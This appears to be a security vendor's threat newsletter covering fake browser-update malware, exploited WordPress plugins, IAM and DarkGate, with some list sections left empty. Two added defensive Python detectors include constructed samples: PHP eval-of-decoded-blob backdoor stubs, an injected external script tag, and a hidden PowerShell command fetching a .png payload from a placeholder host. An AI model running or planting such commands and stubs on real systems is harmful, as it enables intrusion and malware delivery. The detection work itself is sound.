Tecplix ThreatTrack Insights - June I
1. Fake Browser Updates Spreading Remote Access Trojans and Information Stealers
A new wave of cyber threats involves fake web browser updates used to deliver remote access trojans (RATs) and information stealers such as BitRAT and Lumma Stealer. These deceptive updates have been linked to numerous infections, including those from the notorious SocGholish malware.
The attack chain commences when prospective targets visit a booby-trapped website that contains JavaScript code designed to redirect users to a bogus browser update page ("chatgpt-app[.]cloud"). The redirected web page comes embedded with a download link to a ZIP archive file ("Update.zip") that's hosted on Discord and downloaded automatically to the victim's device.
Present within the ZIP archive file is another JavaScript file ("Update.js"), which triggers the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files. Also retrieved in this manner are PowerShell scripts to establish persistence and a .NET-based loader that's primarily used for launching the final-stage malware.
Key Takeaways:
Impact:
Who is Affected?
Organizations and individuals who inadvertently visit compromised websites and follow misleading browser update prompts are at risk. This includes users across various sectors who may be targeted through drive-by downloads, malvertising, and phishing tactics that exploit their trust in browser updates.
Recommendations:
2. Active Exploitation of Critical Vulnerabilities in WordPress Plugins
Cybersecurity researchers have identified multiple high-severity vulnerabilities in several WordPress plugins that are currently being exploited by malicious actors. These flaws are primarily unauthenticated stored cross-site scripting (XSS) vulnerabilities, which allow attackers to inject malicious scripts due to inadequate input sanitization and output escaping.
Key Takeaways:
Vulnerabilities are present in the following plugins:
Impact:
Attack chains exploiting these vulnerabilities involve injecting payloads pointing to obfuscated JavaScript files hosted on external domains. These scripts facilitate the creation of rogue administrator accounts, insertion of backdoors, and deployment of tracking scripts. The backdoors, written in PHP, are inserted into the plugin and theme files, while the tracking scripts send HTTP GET requests carrying the HTTP Host header to a remote server at "ur.mystiqueapi[.]com/?ur".
Who is Affected?
Website administrators and users running vulnerable versions of the affected plugins are at risk. To mitigate these threats, immediate patching and updates are recommended.
Recommendations:
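An added example (not code from the newsletter, the affected plugins or any vendor) for the injection pattern described in item 2: a Python scanner that checks plugin and theme file contents for script tags loading from domains other than the site's own, for the tracking host quoted above, for inline decode-and-eval wrappers, and for the eval-of-decoded-blob pattern of a dropped PHP backdoor. The sample file contents, the site host example-shop.invalid and the domain cdn.evil-example.invalid are constructed.

```python
import re
from urllib.parse import urlparse
# Tracking host quoted in the item above; it is defanged on the page and refanged here for comparison.
KNOWN_TRACKING_HOSTS = {"ur.mystiqueapi[.]com".replace("[.]", ".")}
SCRIPT_SRC = re.compile(r"""<script[^>]+src\s*=\s*["']([^"']+)["']""", re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)
OBFUSCATED_JS = re.compile(r"\b(eval|atob|unescape|String\.fromCharCode)\s*\(", re.I)
PHP_BACKDOOR = re.compile(r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_file(path, text, site_host):
    """Return (path, rule, detail) tuples for one plugin or theme file's contents."""
    findings = []
    # Injected XSS payloads load script files from domains other than the site's own.
    for src in SCRIPT_SRC.findall(text):
        host = urlparse(src).hostname  # None for relative paths such as /wp-includes/js/x.js
        if host is None or host == site_host:
            continue
        rule = "known-tracking-host" if host in KNOWN_TRACKING_HOSTS else "external-script-src"
        findings.append((path, rule, src))
    # Inline scripts that decode or eval at runtime are the usual obfuscation wrapper.
    for body in INLINE_SCRIPT.findall(text):
        m = OBFUSCATED_JS.search(body)
        if m:
            findings.append((path, "obfuscated-js", m.group(0)))
    # A PHP backdoor dropped into a plugin or theme file typically evals a decoded blob.
    m = PHP_BACKDOOR.search(text)
    if m:
        findings.append((path, "php-backdoor-pattern", m.group(0)))
    return findings

def scan_files(files, site_host):  # files: {relative path: content}; site_host is trusted for script src
    out = []
    for path, text in files.items():
        out.extend(scan_file(path, text, site_host))
    return out
# Constructed sample files; example-shop.invalid (the site) and cdn.evil-example.invalid are made up.
SAMPLE_FILES = {
    "wp-content/themes/shop/header.php":
        '<script src="/wp-includes/js/jquery.min.js"></script>\n'
        '<script src="https://example-shop.invalid/wp-content/themes/shop/app.js"></script>',
    "wp-content/plugins/gallery/gallery.php":
        '<?php /* plugin code */ ?>\n<script src="https://cdn.evil-example.invalid/t.js"></script>\n'
        '<script>eval(atob("..."))</script>',
    "wp-content/themes/shop/functions.php":
        '<?php eval(base64_decode("...")); ?>\n<script src="https://ur.mystiqueapi.com/?ur"></script>',
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES, "example-shop.invalid"):
        print(finding)
```

Run it against a real site by reading the files under wp-content/plugins and wp-content/themes into the dict and passing the site's own hostname; the clean theme header produces no findings while the two tampered files do.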
3. Enhanced Security With IAM: A Comprehensive Guide
According to Verizon, 61% of all security breaches involved credential thefts acquired through social engineering methods or hacked using brute force tactics.
Another study reveals that 44% of security experts believe implementing an Identity and Access Management (IAM) solution can address their current security vulnerabilities.
IAM incorporates management of the entire lifecycle of user identities and access across all enterprise resources, whether in data centers or the cloud. The identity manager regulates access and entitlements through defined roles, policies, and tools, extending privileges to network entities (users and devices) for diverse applications, both on-premises and in the cloud.
IAM’s objective is to grant a single digital identity to each individual or item: users encompass customers, partners, and employees, while devices span computers, smartphones, routers, servers, controllers, and sensors. Once established, the digital identity is maintained, modified, and monitored throughout each user’s or device’s access lifecycle.
Identity Management in Practice
In a broader sense, identity management facilitates access to enterprise assets, aligning with user and device entitlements within specific contexts. This encompasses onboarding users and systems, authorizing permissions, and timely offboarding of users and devices...
4. AutoHotkey-based DarkGate Malware Campaigns Target the U.S., Europe, and Asia
Cyber-attacks involving the DarkGate malware-as-a-service (MaaS) operation have shifted their delivery mechanism from AutoIt scripts to AutoHotkey, marking a significant evolution in their tactics to evade detection. This transition was observed in version 6 of DarkGate, released in March 2024 by its developer RastaFarEye, who markets the malware to a select group of around 30 subscribers. Active since at least 2018, DarkGate continues to pose a significant threat with its advanced features and constant updates.
Key Takeaways
Impact:
DarkGate’s latest developments highlight the persistent threat it poses to organizations worldwide. The malware’s ability to adapt rapidly by changing its delivery methods and incorporating new features while removing old ones that could lead to detection ensures it remains a formidable tool for cybercriminals. Its extensive capabilities, including command-and-control, rootkit functionalities, credential theft, and remote desktop access, enable attackers to execute a wide range of malicious activities, significantly impacting targeted organizations.
Who is Affected?
DarkGate’s recent campaigns have primarily targeted sectors such as healthcare technology, telecommunications, and fintech across the U.S., Europe, and Asia. Organizations in these industries are at heightened risk and should be particularly vigilant about phishing attacks and the evolving tactics used by threat actors behind DarkGate.
Recommendations:
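As an added detection example covering items 1 and 4 (not code from the newsletter or from any vendor), the following Python applies three process-chain rules to constructed Sysmon-like process-creation events: a script host running a .js from Downloads or Temp that spawns PowerShell, PowerShell fetching a .png URL, and an AutoHotkey or AutoIt interpreter launched from a user-writable path. The event shape, the user name alice, the paths and the host example.invalid are assumptions.

```python
import re
from dataclasses import dataclass
@dataclass
class ProcEvent:  # constructed, Sysmon-like process-creation record (not real telemetry)
    pid: int
    ppid: int
    image: str
    cmdline: str

# Where drive-by downloads and extracted ZIPs land; interpreters launched from here deserve a look.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
AUTOMATION_HOSTS = {"autohotkey.exe", "autohotkey64.exe", "autoit3.exe"}
IMAGE_URL = re.compile(r"https?://\S+\.png\b", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I)
def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def detect(events):
    """Return (rule, pid) for every event that matches one of the three rules below."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name, parent = basename(e.image), by_pid.get(e.ppid)
        # Item 1: a .js run by wscript/cscript from Downloads or Temp spawns PowerShell (Update.js step).
        if (name == "powershell.exe" and parent and basename(parent.image) in SCRIPT_HOSTS
                and ".js" in parent.cmdline.lower() and USER_WRITABLE.search(parent.cmdline)):
            findings.append(("fake-update-chain", e.pid))
        # Item 1: PowerShell fetching a .png URL, the disguise the report describes for the payloads.
        if name == "powershell.exe" and IMAGE_URL.search(e.cmdline) and DOWNLOADER.search(e.cmdline):
            findings.append(("png-payload-fetch", e.pid))
        # Item 4: AutoHotkey/AutoIt interpreter started from a user-writable path (DarkGate v6 delivery).
        if name in AUTOMATION_HOSTS and USER_WRITABLE.search(e.cmdline):
            findings.append(("automation-host-userdir", e.pid))
    return findings

# Constructed sample events; example.invalid is a placeholder host and alice a made-up user.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\Update\Update.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/p.png -OutFile $env:TEMP\p.png"),
    ProcEvent(400, 100, r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe",
              r"C:\Users\alice\AppData\Local\Temp\AutoHotkey.exe C:\Users\alice\AppData\Local\Temp\run.ahk"),
    ProcEvent(500, 100, r"C:\Program Files\AutoHotkey\AutoHotkey.exe",  # legitimate install, benign
              r'"C:\Program Files\AutoHotkey\AutoHotkey.exe" C:\Users\alice\Documents\macro.ahk'),
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

The legitimately installed AutoHotkey running a script from Documents produces no finding, which is the false-positive case a rule keyed only on the interpreter name would miss.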
In Crisis?
If you suspect a compromise or face a critical security issue, connect with us to unlock rapid, expert protection. Your security and business continuity are our top priority!
Get in touch with our security team by filling out this form or calling +91 6366 600 700.